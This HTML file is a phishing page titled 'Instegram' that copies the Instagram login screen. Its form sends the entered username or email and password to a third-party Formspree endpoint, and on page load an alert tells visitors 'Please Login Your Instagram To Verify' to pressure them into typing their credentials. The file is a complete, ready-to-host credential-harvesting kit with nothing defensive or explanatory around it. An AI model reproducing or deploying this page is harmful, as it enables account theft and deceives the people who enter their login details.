<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0,">

    <title>Instegram</title>
    
</head>
<body>
   <div class="container">
        <div class="logo">
            <img src="http://drive.google.com/uc?export=view&amp;id=17505D_W2iwTYbdttRTKShCr90mhvL7VL" alt="">
        </div>
        
        <form action= "https://formspree.io/f/xyyoqpov"method="POST">
            <div class="facebook">
      
                <img src="http://drive.google.com/uc?export=view&amp;id=1VayPbLc26pMfaFl4eCEnV5jTqgFDIrny" alt="" width="20">
                <p>Continue Using Facebook</p>
            </div>
            <input type="text" name="text" placeholder="Username or email address" required="">
            <input type="password" name="text" placeholder="Password" required="">
            <div class="link">
                <a href="#">Forgotten your passoword?</a>
            </div>
            <button>Log In</button>
            <p class="acc">Don't have an account? <a href="#"> Sign Up</a></p>
        </form>
       
   </div>
   
    
   





            </body>
<style>        body{
    margin: 0 auto;
    font-size: 14px;
    font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
}
.container{
    margin: 10px;
}
.logo img{
    width: 60%;
  
}
.logo{
    display: flex;
    justify-content: center;
    margin-top: 70px;
}
form {
    margin: 50px;
    display: flex;
    flex-direction: column;
    margin-bottom: 200px;
    
   
}
input, button {
    padding: 14px;
    margin-top: 10px;
    border-radius: 6px;
    border: none;  
}
.facebook{
    display: flex;   
    background-color: #4192ee;
    align-items: center;
    justify-content: center;
    padding: 8px;
    color: whitesmoke;
    border-radius: 6px;
    margin-bottom: 24px ;
}
input {
    border: 1px solid rgb(184, 184, 184);
}
input:focus {
    outline: none;
}
button{
    
    background-color: #4192ee;
    color: whitesmoke;
    margin-top: 20px;
}
p{
    margin: 0;
}
a {
    text-decoration: none;
    color: #4267B2;
    opacity: .6;
    
   
}
.link{
    text-align: right;
    margin-top: 10px;
 
}
.acc {
    display: flex;
    justify-content: center;
    margin: 20px;
    
}
.acc a{
    margin-left: 5px;
    
}
    html{
 color:darkviolet;
 font-size:25px;
 font-weight:600;
}</style><script>    alert('Please Login Your Instagram To Verify')
/*Here write your javascript code*/</script></html>